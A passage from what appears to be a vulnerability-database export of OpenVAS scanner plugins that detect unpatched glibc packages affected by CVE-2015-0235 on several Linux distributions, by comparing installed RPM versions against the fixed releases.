See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123196\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:00:35 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2015-0090\");\n script_tag(name:\"insight\", value:\"ELSA-2015-0090 - glibc security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2015-0090\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2015-0090.html\");\n script_cve_id(\"CVE-2015-0235\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux5\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"glibc\", rpm:\"glibc~2.5~123.0.1.el5_11.1\", 
rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"glibc-common\", rpm:\"glibc-common~2.5~123.0.1.el5_11.1\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"glibc-devel\", rpm:\"glibc-devel~2.5~123.0.1.el5_11.1\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"glibc-headers\", rpm:\"glibc-headers~2.5~123.0.1.el5_11.1\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"glibc-utils\", rpm:\"glibc-utils~2.5~123.0.1.el5_11.1\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"nscd\", rpm:\"nscd~2.5~123.0.1.el5_11.1\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-11-19T13:02:56", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2018-11-16T00:00:00", "published": "2015-02-03T00:00:00", "id": "OPENVAS:1361412562310850633", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850633", "title": "SuSE Update for glibc openSUSE-SU-2015:0184-1 (glibc)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_suse_2015_0184_1.nasl 12381 2018-11-16 11:16:30Z cfischer $\n#\n# SuSE Update for glibc openSUSE-SU-2015:0184-1 (glibc)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as 
published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850633\");\n script_version(\"$Revision: 12381 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-16 12:16:30 +0100 (Fri, 16 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-02-03 05:45:11 +0100 (Tue, 03 Feb 2015)\");\n script_cve_id(\"CVE-2015-0235\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"SuSE Update for glibc openSUSE-SU-2015:0184-1 (glibc)\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'glibc'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"This update for glibc fixes the following security issue:\n\n CVE-2015-0235: A vulnerability was found and fixed in the GNU C Library,\n specifically in the function gethostbyname(), that could lead to a local\n or remote buffer overflow. 
(bsc#913646)\");\n script_tag(name:\"affected\", value:\"glibc on openSUSE 12.3\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_xref(name:\"openSUSE-SU\", value:\"2015:0184_1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSE12\\.3\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\nres = \"\";\n\nif(release == \"openSUSE12.3\")\n{\n\n if ((res = isrpmvuln(pkg:\"glibc\", rpm:\"glibc~2.17~4.17.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-debuginfo\", rpm:\"glibc-debuginfo~2.17~4.17.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-debugsource\", rpm:\"glibc-debugsource~2.17~4.17.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-devel\", rpm:\"glibc-devel~2.17~4.17.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-devel-debuginfo\", rpm:\"glibc-devel-debuginfo~2.17~4.17.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-devel-static\", rpm:\"glibc-devel-static~2.17~4.17.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-extra\", rpm:\"glibc-extra~2.17~4.17.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n 
}\n\n if ((res = isrpmvuln(pkg:\"glibc-extra-debuginfo\", rpm:\"glibc-extra-debuginfo~2.17~4.17.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-locale\", rpm:\"glibc-locale~2.17~4.17.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-locale-debuginfo\", rpm:\"glibc-locale-debuginfo~2.17~4.17.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-profile\", rpm:\"glibc-profile~2.17~4.17.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-utils\", rpm:\"glibc-utils~2.17~4.17.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-utils-debuginfo\", rpm:\"glibc-utils-debuginfo~2.17~4.17.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-utils-debugsource\", rpm:\"glibc-utils-debugsource~2.17~4.17.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nscd\", rpm:\"nscd~2.17~4.17.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nscd-debuginfo\", rpm:\"nscd-debuginfo~2.17~4.17.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-utils-32bit\", rpm:\"glibc-utils-32bit~2.17~4.17.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-utils-debuginfo-32bit\", rpm:\"glibc-utils-debuginfo-32bit~2.17~4.17.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-html\", rpm:\"glibc-html~2.17~4.17.1\", rls:\"openSUSE12.3\")) != 
NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-i18ndata\", rpm:\"glibc-i18ndata~2.17~4.17.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-info\", rpm:\"glibc-info~2.17~4.17.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-obsolete\", rpm:\"glibc-obsolete~2.17~4.17.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-obsolete-debuginfo\", rpm:\"glibc-obsolete-debuginfo~2.17~4.17.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-02T14:30:23", "bulletinFamily": "scanner", "description": "Amazon Linux Local Security Checks", "modified": "2018-10-01T00:00:00", "published": "2015-09-08T00:00:00", "id": "OPENVAS:1361412562310120286", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120286", "title": "Amazon Linux Local Check: ALAS-2015-473", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: alas-2015-473.nasl 6575 2017-07-06 13:42:08Z cfischer$\n#\n# Amazon Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@iki.fi>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://ping-viini.org\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR 
PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120286\");\n script_version(\"$Revision: 11711 $\");\n script_tag(name:\"creation_date\", value:\"2015-09-08 13:22:42 +0200 (Tue, 08 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-01 14:30:57 +0200 (Mon, 01 Oct 2018) $\");\n script_name(\"Amazon Linux Local Check: ALAS-2015-473\");\n script_tag(name:\"insight\", value:\"Multiple flaws were found in glibc. Please see the references for more information.\");\n script_tag(name:\"solution\", value:\"Run yum update glibc to update your system. Note that you may need to run yum clean all first. Once this update has been applied, reboot your instance to ensure that all processes and daemons that link against glibc are using the updated version. 
On new instance launches, you should still reboot after cloud-init has automatically applied this update.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2015-473.html\");\n script_cve_id(\"CVE-2015-0235\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Amazon Linux Local Security Checks\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"AMAZON\")\n{\nif ((res = isrpmvuln(pkg:\"glibc-static\", rpm:\"glibc-static~2.17~55.93.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"glibc-common\", rpm:\"glibc-common~2.17~55.93.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"nscd\", rpm:\"nscd~2.17~55.93.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"glibc-devel\", rpm:\"glibc-devel~2.17~55.93.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"glibc\", rpm:\"glibc~2.17~55.93.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"glibc-utils\", rpm:\"glibc-utils~2.17~55.93.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"glibc-debuginfo\", rpm:\"glibc-debuginfo~2.17~55.93.amzn1\", 
rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"glibc-headers\", rpm:\"glibc-headers~2.17~55.93.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"glibc-debuginfo-common\", rpm:\"glibc-debuginfo-common~2.17~55.93.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:52:10", "bulletinFamily": "scanner", "description": "Check the version of glibc", "modified": "2017-07-10T00:00:00", "published": "2015-01-28T00:00:00", "id": "OPENVAS:1361412562310882109", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882109", "title": "CentOS Update for glibc CESA-2015:0092 centos6 ", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for glibc CESA-2015:0092 centos6 \n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882109\");\n script_version(\"$Revision: 6657 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 13:50:44 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2015-01-28 06:10:55 +0100 (Wed, 28 Jan 2015)\");\n script_cve_id(\"CVE-2015-0235\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"CentOS Update for glibc CESA-2015:0092 centos6 \");\n script_tag(name: \"summary\", value: \"Check the version of glibc\");\n script_tag(name: \"vuldetect\", value: \"Get the installed version with the help of detect NVT and check if the version is vulnerable or not.\");\n script_tag(name: \"insight\", value: \"The glibc packages provide the standard C libraries (libc), POSIX thread\nlibraries (libpthread), standard math libraries (libm), and the Name\nServer Caching Daemon (nscd) used by multiple programs on the system.\nWithout these libraries, the Linux system cannot function correctly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the gethostbyname()\nand gethostbyname2() glibc function calls. A remote attacker able to make\nan application call either of these functions could use this flaw to\nexecute arbitrary code with the permissions of the user running the\napplication. 
(CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue.\n\");\n script_tag(name: \"affected\", value: \"glibc on CentOS 6\");\n script_tag(name: \"solution\", value: \"Please Install the Updated Packages.\");\n script_xref(name: \"CESA\", value: \"2015:0092\");\n script_xref(name: \"URL\" , value: \"http://lists.centos.org/pipermail/centos-announce/2015-January/020907.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"glibc\", rpm:\"glibc~2.12~1.149.el6_6.5\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-common\", rpm:\"glibc-common~2.12~1.149.el6_6.5\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-devel\", rpm:\"glibc-devel~2.12~1.149.el6_6.5\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-headers\", rpm:\"glibc-headers~2.12~1.149.el6_6.5\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-static\", rpm:\"glibc-static~2.12~1.149.el6_6.5\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-utils\", 
rpm:\"glibc-utils~2.12~1.149.el6_6.5\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nscd\", rpm:\"nscd~2.12~1.149.el6_6.5\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-11-19T13:03:16", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2018-11-16T00:00:00", "published": "2015-10-13T00:00:00", "id": "OPENVAS:1361412562310850839", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850839", "title": "SuSE Update for glibc SUSE-SU-2015:0158-1 (glibc)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_suse_2015_0158_1.nasl 12381 2018-11-16 11:16:30Z cfischer $\n#\n# SuSE Update for glibc SUSE-SU-2015:0158-1 (glibc)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850839\");\n script_version(\"$Revision: 12381 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-16 12:16:30 +0100 (Fri, 16 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-10-13 18:35:01 +0530 (Tue, 13 Oct 2015)\");\n script_cve_id(\"CVE-2015-0235\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"SuSE Update for glibc SUSE-SU-2015:0158-1 (glibc)\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'glibc'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"This update for glibc fixes the following security issue:\n\n CVE-2015-0235: A vulnerability was found and fixed in the GNU C Library,\n specifically in the function gethostbyname(), that could lead to a local\n or remote buffer overflow. 
(bsc#913646)\");\n\n script_tag(name:\"affected\", value:\"glibc on SUSE Linux Enterprise Server 11 SP3\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_xref(name:\"SUSE-SU\", value:\"2015:0158_1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=SLES11\\.0SP3\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\nres = \"\";\n\nif(release == \"SLES11.0SP3\")\n{\n\n if ((res = isrpmvuln(pkg:\"glibc\", rpm:\"glibc~2.11.3~17.74.13\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-devel\", rpm:\"glibc-devel~2.11.3~17.74.13\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-html\", rpm:\"glibc-html~2.11.3~17.74.13\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-i18ndata\", rpm:\"glibc-i18ndata~2.11.3~17.74.13\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-info\", rpm:\"glibc-info~2.11.3~17.74.13\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-locale\", rpm:\"glibc-locale~2.11.3~17.74.13\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-profile\", rpm:\"glibc-profile~2.11.3~17.74.13\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nscd\", 
rpm:\"nscd~2.11.3~17.74.13\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-32bit\", rpm:\"glibc-32bit~2.11.3~17.74.13\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-devel-32bit\", rpm:\"glibc-devel-32bit~2.11.3~17.74.13\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-locale-32bit\", rpm:\"glibc-locale-32bit~2.11.3~17.74.13\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-profile-32bit\", rpm:\"glibc-profile-32bit~2.11.3~17.74.13\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-locale-x86\", rpm:\"glibc-locale-x86~2.11.3~17.74.13\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-profile-x86\", rpm:\"glibc-profile-x86~2.11.3~17.74.13\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-x86\", rpm:\"glibc-x86~2.11.3~17.74.13\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:52:54", "bulletinFamily": "scanner", "description": "Check the version of glibc", "modified": "2017-07-10T00:00:00", "published": "2015-01-28T00:00:00", "id": "OPENVAS:1361412562310882108", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882108", "title": "CentOS Update for glibc CESA-2015:0092 centos7 ", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for glibc CESA-2015:0092 
centos7 \n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882108\");\n script_version(\"$Revision: 6657 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 13:50:44 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2015-01-28 06:10:49 +0100 (Wed, 28 Jan 2015)\");\n script_cve_id(\"CVE-2015-0235\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"CentOS Update for glibc CESA-2015:0092 centos7 \");\n script_tag(name: \"summary\", value: \"Check the version of glibc\");\n script_tag(name: \"vuldetect\", value: \"Get the installed version with the help of detect NVT and check if the version is vulnerable or not.\");\n script_tag(name: \"insight\", value: \"The glibc packages provide the standard C libraries (libc), POSIX thread\nlibraries (libpthread), standard math libraries (libm), and the Name\nServer Caching Daemon (nscd) used by 